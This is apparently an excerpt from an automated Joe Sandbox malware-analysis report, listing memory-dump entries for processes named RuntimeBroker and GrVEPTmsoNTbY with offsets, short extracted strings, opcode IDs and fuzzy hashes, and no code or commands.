                                                      • Source File: 00000023.00000002.2386946807.00007FF848E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E90000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_35_2_7ff848e90000_RuntimeBroker.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: c9$!k9$"s9$#{9
                                                      • API String ID: 0-1692736845
                                                      • Opcode ID: 0edf5382342b5c7c991cac7bfef69dcd1410d9caf6c62a3a0452b474a5a2f4c4
                                                      • Instruction ID: 677935ebcababdf093b0807f4e5c51e0347660e4735a7befde72b6a073c3378f
                                                      • Opcode Fuzzy Hash: 0edf5382342b5c7c991cac7bfef69dcd1410d9caf6c62a3a0452b474a5a2f4c4
                                                      • Instruction Fuzzy Hash: FE517CD6ACA9623DE11E36FDB4020F96B44EF813B9F4C9677E04C890934E59608686FD
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000025.00000002.2384244803.00007FF848E80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E80000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_37_2_7ff848e80000_RuntimeBroker.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: 5Y_H$<M_^
                                                      • API String ID: 0-383103648
                                                      • Opcode ID: 8a7342dcf4c098a58c7805a85c435de2e2e817b518bdd82d87d3adf2d52599e3
                                                      • Instruction ID: ca8f82df7599fec23cd1f7e2be09df268255ed9162fea6931537339b0522c195
                                                      • Opcode Fuzzy Hash: 8a7342dcf4c098a58c7805a85c435de2e2e817b518bdd82d87d3adf2d52599e3
                                                      • Instruction Fuzzy Hash: C891EE70D1DA8D9FE789EB2888693B97FE1FB96364F4401BAC009E72D2DB791804C715
                                                      Memory Dump Source
                                                      • Source File: 00000025.00000002.2384244803.00007FF848E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E90000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_37_2_7ff848e90000_RuntimeBroker.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 4f063caf71b4f0eb2c644563362152ae8ad1b0304d7ea9f7d7d2f6410bbe9013
                                                      • Instruction ID: b1e67de12b94ea2c1501164d9a0e75838c561839a353e0918f5d1896e583c08e
                                                      • Opcode Fuzzy Hash: 4f063caf71b4f0eb2c644563362152ae8ad1b0304d7ea9f7d7d2f6410bbe9013
                                                      • Instruction Fuzzy Hash: 9832A221E1CD5A9FEA98FA6884556B873E2FF98784F5441B9C00DC3287DF3DAC428785
                                                      Memory Dump Source
                                                      • Source File: 00000025.00000002.2384244803.00007FF848E80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E80000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_37_2_7ff848e80000_RuntimeBroker.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: cce0fe3eda5d19e0684b807a57dff918f2b321a32060f704ba9ec9488a0d563f
                                                      • Instruction ID: 2e1f5d7d522c3f526ed5767e32d97b946fd7efa9e261ac83f5c94f8c18ee05fe
                                                      • Opcode Fuzzy Hash: cce0fe3eda5d19e0684b807a57dff918f2b321a32060f704ba9ec9488a0d563f
                                                      • Instruction Fuzzy Hash: 5551C271E18A5D8EE398EB1898597B97FE1FB86369F4002BEC009E37D2DBB91411C714
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000025.00000002.2384244803.00007FF848EB1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848EB1000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_37_2_7ff848eb1000_RuntimeBroker.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: I_H
                                                      • API String ID: 0-288374528
                                                      • Opcode ID: 9cc919025bec79329b757c97f0b98042756b51d6c34ea7b51a08a62522e990f1
                                                      • Instruction ID: a3ae143777e87e3f3dd58f1a250c6bd28027d4c205379c0788360410ae4222bc
                                                      • Opcode Fuzzy Hash: 9cc919025bec79329b757c97f0b98042756b51d6c34ea7b51a08a62522e990f1
                                                      • Instruction Fuzzy Hash: 9A81A131E1C94A5FEA98FA2C88562B577D2FFA8791F0441B9D40DC32C7DE7CA8418789
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000025.00000002.2384244803.00007FF848EB1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848EB1000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_37_2_7ff848eb1000_RuntimeBroker.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: I_H
                                                      • API String ID: 0-288374528
                                                      • Opcode ID: a01936f15079cbfd505f2464719f0b2b27f1a7b4741bc0df462171dd61a8c46c
                                                      • Instruction ID: 872f108559f6b0da9ebfdedc56ff00a59c9141cc16d5b2c599f14172d267b99b
                                                      • Opcode Fuzzy Hash: a01936f15079cbfd505f2464719f0b2b27f1a7b4741bc0df462171dd61a8c46c
                                                      • Instruction Fuzzy Hash: 82518F21E1C95A5FEB98FA2C84563B573D2FFA4791F4481B9D40EC3287DE3CA8418385
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000025.00000002.2384244803.00007FF848EB1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848EB1000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_37_2_7ff848eb1000_RuntimeBroker.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: M
                                                      • API String ID: 0-3664761504
                                                      • Opcode ID: af62d64c9eea5667c441b423537b2437a84c908086ff5a8e99bf5604b8924664
                                                      • Instruction ID: 9bc60aab2d95d71ba3516f50865908653f7a6e85a339ffa963ee6dbb17b3229c
                                                      • Opcode Fuzzy Hash: af62d64c9eea5667c441b423537b2437a84c908086ff5a8e99bf5604b8924664
                                                      • Instruction Fuzzy Hash: CBF06D7190E7C48FCB1AEA3488694547FA0EF6720174A46EEC085CF1A3EA2DCC89CB11
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000025.00000002.2384244803.00007FF848EB1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848EB1000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_37_2_7ff848eb1000_RuntimeBroker.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: M
                                                      • API String ID: 0-3664761504
                                                      • Opcode ID: c14079f909465edeacc4e4ac41ab61fc6129e76ed6af58be8bfd6d9e3434686b
                                                      • Instruction ID: 25fad13e3738dcfd67e17979f3d9864b2ea717ffd0f090844797d40fe1b96cf2
                                                      • Opcode Fuzzy Hash: c14079f909465edeacc4e4ac41ab61fc6129e76ed6af58be8bfd6d9e3434686b
                                                      • Instruction Fuzzy Hash: 40F06D7190E7C48FDB1AEB7888698557FA0EF6720174A42EFC045CF1A3EA2DC889C701
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000025.00000002.2384244803.00007FF848E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E90000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_37_2_7ff848e90000_RuntimeBroker.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: I
                                                      • API String ID: 0-3707901625
                                                      • Opcode ID: 05f981d2bdfbb70e16728106f6da44c75e12cce0a70ce9b067860316278d5ea0
                                                      • Instruction ID: 22e0f9b84c8e0976449a7ffc22ad5a6e90d7b32a7d76d0ad7e176be99a9c2356
                                                      • Opcode Fuzzy Hash: 05f981d2bdfbb70e16728106f6da44c75e12cce0a70ce9b067860316278d5ea0
                                                      • Instruction Fuzzy Hash: 8BE01A7194E7C44FCB0AEA74887A8543FA0EE6B25178A40EEC045CF1B3E66DC84AC701
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000025.00000002.2384244803.00007FF848EB1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848EB1000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_37_2_7ff848eb1000_RuntimeBroker.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: I
                                                      • API String ID: 0-3707901625
                                                      • Opcode ID: 1c3f5f7381fda12de9fd3b56ca3b5b258e950b3deb9177c500fe15ad4dde55b0
                                                      • Instruction ID: fab309a02eb38c18ccbe73b8a32d64f6c988185e2e3e8dcfb88004a3f5813fd3
                                                      • Opcode Fuzzy Hash: 1c3f5f7381fda12de9fd3b56ca3b5b258e950b3deb9177c500fe15ad4dde55b0
                                                      • Instruction Fuzzy Hash: CAE0487144E7D44FCB06EB3484698553F60EF6721578A40EEC045CF1B3E62D988AC701
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000025.00000002.2384244803.00007FF848EB1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848EB1000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_37_2_7ff848eb1000_RuntimeBroker.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: I
                                                      • API String ID: 0-3707901625
                                                      • Opcode ID: 3a1ee097e8447e0de5faaae1d02f8aabf37f0114f9ac78b61e4219991670ecbc
                                                      • Instruction ID: 1f3aab2526cadab3994b5b12a911b89d2b7f9689e191491a9806ec64aeeabe8d
                                                      • Opcode Fuzzy Hash: 3a1ee097e8447e0de5faaae1d02f8aabf37f0114f9ac78b61e4219991670ecbc
                                                      • Instruction Fuzzy Hash: 49E01A7184E7C48FCB4AEB74886A9543FA0EE6B21178A40EEC045CF1B3E62D8849C701
                                                      Memory Dump Source
                                                      • Source File: 00000025.00000002.2384244803.00007FF848E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E90000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_37_2_7ff848e90000_RuntimeBroker.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 6046c6e4776b9c72707c20de9e8fb80ac4d5b5da1bdda560fe03be9c83ff8afc
                                                      • Instruction ID: e410a45d482733f282a8568af36b76f0cce1aba48ad000c16f0b6bf12e9b52a3
                                                      • Opcode Fuzzy Hash: 6046c6e4776b9c72707c20de9e8fb80ac4d5b5da1bdda560fe03be9c83ff8afc
                                                      • Instruction Fuzzy Hash: 1B026D31E1C95A9FEB98FA6884516B873E1FF58784F5441B9D00DD3287CF3DA8828B45
                                                      Memory Dump Source
                                                      • Source File: 00000025.00000002.2384244803.00007FF848E80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E80000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_37_2_7ff848e80000_RuntimeBroker.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: aeae343dffb8baa8882341ee1091c3823af7392ef8c6c2af71c60ad31732db1f
                                                      • Instruction ID: d5f4b2a876564efdb83488b5074536e18efe2af13f6bfe376fdc04d3d0a741b6
                                                      • Opcode Fuzzy Hash: aeae343dffb8baa8882341ee1091c3823af7392ef8c6c2af71c60ad31732db1f
                                                      • Instruction Fuzzy Hash: 85416852A4E9652EE709B77CA0992FC7B80EF453A5F1841BBD04CC71D3DE28A8818699
                                                      Memory Dump Source
                                                      • Source File: 00000025.00000002.2384244803.00007FF848E80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E80000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_37_2_7ff848e80000_RuntimeBroker.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 08c3238b3ddf729b6958ad25dc33deaab8cb7dce8da41409eccda3c0ba58aa5d
                                                      • Instruction ID: 54422113e45d363d264bdf9feff957ef817aeedb23b2a7faaf80fcc629b7b216
                                                      • Opcode Fuzzy Hash: 08c3238b3ddf729b6958ad25dc33deaab8cb7dce8da41409eccda3c0ba58aa5d
                                                      • Instruction Fuzzy Hash: 4131F020B1D9595FEA98F63C944A67C76C2FF98755F8000B9E40EC32E7EE2CA8818645
                                                      Memory Dump Source
                                                      • Source File: 00000025.00000002.2384244803.00007FF848E80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E80000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_37_2_7ff848e80000_RuntimeBroker.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 3e2f95037095dc13f6620f3fa1962d80c16fb65d9211c18d3eaf51f23a5e70a4
                                                      • Instruction ID: 9f41dd0a5a708b134b73fda37964427c8655bdb07c7258f19bb1bfc706d79194
                                                      • Opcode Fuzzy Hash: 3e2f95037095dc13f6620f3fa1962d80c16fb65d9211c18d3eaf51f23a5e70a4
                                                      • Instruction Fuzzy Hash: D6316D3190D68A8FDB46EB68C8659AD7BF1FF26340F4805BAC009D72A3DB39A844C751
                                                      Memory Dump Source
                                                      • Source File: 00000025.00000002.2384244803.00007FF848EB1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848EB1000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_37_2_7ff848eb1000_RuntimeBroker.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 2cd395db07b556c4f38908b81630f30f3124ebfc3977b518b1f835076b2356ce
                                                      • Instruction ID: 5348031c1677b2b3e974a2c1ca4ec6a60888d7beca9be50b03b0f686e16a44fa
                                                      • Opcode Fuzzy Hash: 2cd395db07b556c4f38908b81630f30f3124ebfc3977b518b1f835076b2356ce
                                                      • Instruction Fuzzy Hash: CA317331E1C94A8FEB55EA18C4956B873E2FFA8754F044279C00ED72C7DE78A8418785
                                                      Memory Dump Source
                                                      • Source File: 00000025.00000002.2384244803.00007FF848E80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E80000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_37_2_7ff848e80000_RuntimeBroker.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 5f31bb4765589e3bbf43aa4dab1083cb116eca122b6a36b9e55ecebfa93abe14
                                                      • Instruction ID: f44f54f9267c861cb64b3f4367aca30c7d03f8975fb65f23beb02aaeec64e80c
                                                      • Opcode Fuzzy Hash: 5f31bb4765589e3bbf43aa4dab1083cb116eca122b6a36b9e55ecebfa93abe14
                                                      • Instruction Fuzzy Hash: 1B212551A4DD163EF65CB27C644A2FC22C1FF483A5F5840BAE40DC31E3CE2CA8808699
                                                      Memory Dump Source
                                                      • Source File: 00000025.00000002.2384244803.00007FF848E80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E80000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_37_2_7ff848e80000_RuntimeBroker.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 035c5ad3b146be40c5fbf1f7ea6f0c1f034e7770c03c8b43d4b1691ea0a8c3ca
                                                      • Instruction ID: e2916f8f3927bac2856ae2f3f79d098971771a8ef401f154be0260b14a816d97
                                                      • Opcode Fuzzy Hash: 035c5ad3b146be40c5fbf1f7ea6f0c1f034e7770c03c8b43d4b1691ea0a8c3ca
                                                      • Instruction Fuzzy Hash: 03214C21E0C90A8FEBA4FB6884587BC22D2FF94391F9546B5D40DD32A2DF38AC418758
                                                      Memory Dump Source
                                                      • Source File: 00000025.00000002.2384244803.00007FF848E80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E80000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_37_2_7ff848e80000_RuntimeBroker.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 1659974de2cad02abd8f67ffaf2ab903ee4f0b67a5861d49d52ed02b7068ecaa
                                                      • Instruction ID: 4cfe3393c61a4035d3f6a5b33a4d1ca3dc0813feaee774b6b32ad3db636ba49e
                                                      • Opcode Fuzzy Hash: 1659974de2cad02abd8f67ffaf2ab903ee4f0b67a5861d49d52ed02b7068ecaa
                                                      • Instruction Fuzzy Hash: AC21D331A0D6899FE711FF68C8456EC7FA0FF42355F5441FAC0449B1D2DB3815498B65
                                                      Memory Dump Source
                                                      • Source File: 00000025.00000002.2384244803.00007FF848E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E90000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_37_2_7ff848e90000_RuntimeBroker.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 7be91c1f0ae83a7bd133f5a664b60ff76be4261f50f5324b4559f2b67a2b8251
                                                      • Instruction ID: abbd0e3e283a064e2ebac4cda9bf775290763dd3cefe0422f784367c7492297c
                                                      • Opcode Fuzzy Hash: 7be91c1f0ae83a7bd133f5a664b60ff76be4261f50f5324b4559f2b67a2b8251
                                                      • Instruction Fuzzy Hash: EB117C21E0C91A4FEBA8FB6884516B872D2FF98344F9005BAD40EC72D6DF78AC024784
                                                      Memory Dump Source
                                                      Memory Dump Source
                                                      • Source File: 00000025.00000002.2384244803.00007FF848EB1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848EB1000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_37_2_7ff848eb1000_RuntimeBroker.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 30b88120e300ce741a67909c90f8bad83c6bf9a8a2db7280cd1828b58fc114cc
                                                      • Instruction ID: 8f180aab2aa75e9180ee0f7869d42a8d0eff98467748f81fc95ef1229aac25a4
                                                      • Opcode Fuzzy Hash: 30b88120e300ce741a67909c90f8bad83c6bf9a8a2db7280cd1828b58fc114cc
                                                      • Instruction Fuzzy Hash: D2D01230750D084F8B4CF63C885996033D1E76D2167854059D00AC72B1E966DC89C741
                                                      Memory Dump Source
                                                      • Source File: 00000025.00000002.2384244803.00007FF848EB1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848EB1000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_37_2_7ff848eb1000_RuntimeBroker.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 3f85fd52fba64f279a4f3a6930ff2988cea1587b614e6e9b6eb59ce1dd6ca5eb
                                                      • Instruction ID: 627c17e139fed78debd96b5f264f4ccc04e0e0a128c9c2da64bcc411b2ed45b6
                                                      • Opcode Fuzzy Hash: 3f85fd52fba64f279a4f3a6930ff2988cea1587b614e6e9b6eb59ce1dd6ca5eb
                                                      • Instruction Fuzzy Hash: 73D01234B549044FC70CB6388C99C747391EB6E216B9540ADD00AD77B1DA6ADC89CB41
                                                      Memory Dump Source
                                                      • Source File: 00000025.00000002.2384244803.00007FF848EB1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848EB1000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_37_2_7ff848eb1000_RuntimeBroker.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 68f8eb30df453edda37dc56eca5fbe8d0d3c4f9fcdc6587351046ae7d8bb2356
                                                      • Instruction ID: a1b89c7fc47824ca41353d7ed97788391dad4335844ea0bde91eb149b60312ea
                                                      • Opcode Fuzzy Hash: 68f8eb30df453edda37dc56eca5fbe8d0d3c4f9fcdc6587351046ae7d8bb2356
                                                      • Instruction Fuzzy Hash: BAD01234B549094FC70CF638985987473A1EB6A216B9540B9D00AC72B1DA6ADC89C741
                                                      Memory Dump Source
                                                      • Source File: 00000025.00000002.2384244803.00007FF848E80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E80000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_37_2_7ff848e80000_RuntimeBroker.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 9a53fffbf47e8b827f8280769b86e4b9331d22277492955711db5a8e4f30c3f9
                                                      • Instruction ID: 86768869b4743e8fc2d14d81b3a7159010f65cc74b77f0d786da0c324266f904
                                                      • Opcode Fuzzy Hash: 9a53fffbf47e8b827f8280769b86e4b9331d22277492955711db5a8e4f30c3f9
                                                      • Instruction Fuzzy Hash: 61D05E31A1CA4A4EFB91B7B0841A2BD5292BF10340F880478D85E971C3CF3F34005A94
                                                      Memory Dump Source
                                                      • Source File: 00000025.00000002.2384244803.00007FF848E80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E80000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_37_2_7ff848e80000_RuntimeBroker.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 0f056a88d4526d4a05755b6429272dcde325ccc0fd39d39c3356d543093bbfa2
                                                      • Instruction ID: c31856955ed2e3c74bff67d5eed7038733c80ad951e00bd8430a1a3eff3b721d
                                                      • Opcode Fuzzy Hash: 0f056a88d4526d4a05755b6429272dcde325ccc0fd39d39c3356d543093bbfa2
                                                      • Instruction Fuzzy Hash: 86C08C00D0F90B08E440316F14020ACA2007FC47A4FE10032C01C42092EE3D20C5116E
                                                      Memory Dump Source
                                                      • Source File: 00000025.00000002.2384244803.00007FF848E80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E80000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_37_2_7ff848e80000_RuntimeBroker.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 86b4d57d277300af1bb407b1db35b0ccb04d8e894e64b2ce4cdfe60b85970ed7
                                                      • Instruction ID: 93df89259070d39eeee891dfa952953b187c30ae293fd6bc712e26a92ea0700f
                                                      • Opcode Fuzzy Hash: 86b4d57d277300af1bb407b1db35b0ccb04d8e894e64b2ce4cdfe60b85970ed7
                                                      • Instruction Fuzzy Hash: FCD05222C1D9228EFA72214008241BD0201AB803B0FA90772D86D2B0C09F7CAC019A2A
                                                      Memory Dump Source
                                                      • Source File: 00000025.00000002.2384244803.00007FF848E80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E80000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_37_2_7ff848e80000_RuntimeBroker.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 3434e4c200470a55205a769e0bdb57b0bd16550e86ef3948b0a85cc92d65b229
                                                      • Instruction ID: 4aa18af1f661fabb0a2e2203a43a442a2c3407ad42402b65ed2ba776a251d591
                                                      • Opcode Fuzzy Hash: 3434e4c200470a55205a769e0bdb57b0bd16550e86ef3948b0a85cc92d65b229
                                                      • Instruction Fuzzy Hash: D6C08C305108088FC908FB28C88480837A0FF09200BC20090E008C7170D229DCC1D741
                                                      Memory Dump Source
                                                      • Source File: 00000025.00000002.2384244803.00007FF848E80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E80000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_37_2_7ff848e80000_RuntimeBroker.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 19a0e5630a833397944d504fe41ebb430271e853582a35f048b20d25221aeed7
                                                      • Instruction ID: fa0e485c9cc0cb8398afc22e5057af43897503fa949f4c49e72e71342f46a56a
                                                      • Opcode Fuzzy Hash: 19a0e5630a833397944d504fe41ebb430271e853582a35f048b20d25221aeed7
                                                      • Instruction Fuzzy Hash: 03C08C01E0DC5A9AE256620450221BE44029F80788F9400B5E00E873CACF0C1D01428A
                                                      Memory Dump Source
                                                      • Source File: 00000025.00000002.2384244803.00007FF848E80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E80000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_37_2_7ff848e80000_RuntimeBroker.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: a78a74dc4bf2f834ffd4e85e6ada64bb77668f280636e538a7a23ceeaa807a1d
                                                      • Instruction ID: 37703ee556c4e8627d10b7c80c769574e06979db5dbbed10f1728ee220f40bb0
                                                      • Opcode Fuzzy Hash: a78a74dc4bf2f834ffd4e85e6ada64bb77668f280636e538a7a23ceeaa807a1d
                                                      • Instruction Fuzzy Hash: 0BB01200C5E40F04E40431BB084306C70407FC4244FC10070D40C41182E97D1094025A
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000025.00000002.2384244803.00007FF848E80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E80000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_37_2_7ff848e80000_RuntimeBroker.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: c9$!k9$"s9$#{9
                                                      • API String ID: 0-1692736845
                                                      • Opcode ID: bfa2c339f050b900016796cb309f7cc88d50831665c47b0694f3740441f1cca7
                                                      • Instruction ID: d8d3bf98ff88aa51002e8d513fa4bc641ecc0acbef1d3040d477bc56c04107bd
                                                      • Opcode Fuzzy Hash: bfa2c339f050b900016796cb309f7cc88d50831665c47b0694f3740441f1cca7
                                                      • Instruction Fuzzy Hash: 9F515ED6ADE86A7DE61D36BDB4111FD6B44EF812B5F4C93B7E04C890838E18608186FD
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000026.00000002.2298345420.00007FF848E60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E60000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_38_2_7ff848e60000_GrVEPTmsoNTbY.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: 5[_H$<O_^
                                                      • API String ID: 0-4097811043
                                                      • Opcode ID: 80a65cafcd9180dd51f6007d4065dc7fbc89fb2e4e059592fcd8e214a844ce03
                                                      • Instruction ID: 997b47c38c198bfc01185b7b5b58337a1f212d6d86212026e425e0bb966b834f
                                                      • Opcode Fuzzy Hash: 80a65cafcd9180dd51f6007d4065dc7fbc89fb2e4e059592fcd8e214a844ce03
                                                      • Instruction Fuzzy Hash: D5912070D1CA998FE789EB2888683A97FE0FB96350F4401BFC049E72D2DB782805C751
                                                      Memory Dump Source
                                                      • Source File: 00000026.00000002.2298345420.00007FF848E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E70000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_38_2_7ff848e70000_GrVEPTmsoNTbY.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: bb620311adc114da4834bbcae6c1b593fa98cfcf82ca011ba5faa692858b0ada
                                                      • Instruction ID: 787f20aaba5f562e451a65e875ec26245c2d9ec966b0927f5f918cb5d5fd9892
                                                      • Opcode Fuzzy Hash: bb620311adc114da4834bbcae6c1b593fa98cfcf82ca011ba5faa692858b0ada
                                                      • Instruction Fuzzy Hash: 8832A321E1CD5A9FEA98FA2884516B973E2FF94780F5445B9C00EC32C7DF39AD428785
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000026.00000002.2298345420.00007FF848E91000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E91000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_38_2_7ff848e91000_GrVEPTmsoNTbY.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: K_H
                                                      • API String ID: 0-313846638
                                                      • Opcode ID: 42b85c14721e9f4c92e13ca788842edc17d2cf6ca8287d3d2f4c88c1e3a837b9
                                                      • Instruction ID: 60a59a1571c1e139e0211b2c54c37be7afad35553796a7b0daed175e7c83c5bf
                                                      • Opcode Fuzzy Hash: 42b85c14721e9f4c92e13ca788842edc17d2cf6ca8287d3d2f4c88c1e3a837b9
                                                      • Instruction Fuzzy Hash: 4381F121E1C98A5FEA98FA6C84663B972D2FF58784F0451B9D40DC32D7DFB8AC418385
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000026.00000002.2298345420.00007FF848E91000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E91000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_38_2_7ff848e91000_GrVEPTmsoNTbY.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: K_H
                                                      • API String ID: 0-313846638
                                                      • Opcode ID: eec5591cc25538d4d742259da19fe434d1e9da848cdd1b63b67787b721d42569
                                                      • Instruction ID: 105e7bbb9e2f1d7acaa5347f233fd071d72d03102936cb97d8acefe2d1b9f856
                                                      • Opcode Fuzzy Hash: eec5591cc25538d4d742259da19fe434d1e9da848cdd1b63b67787b721d42569
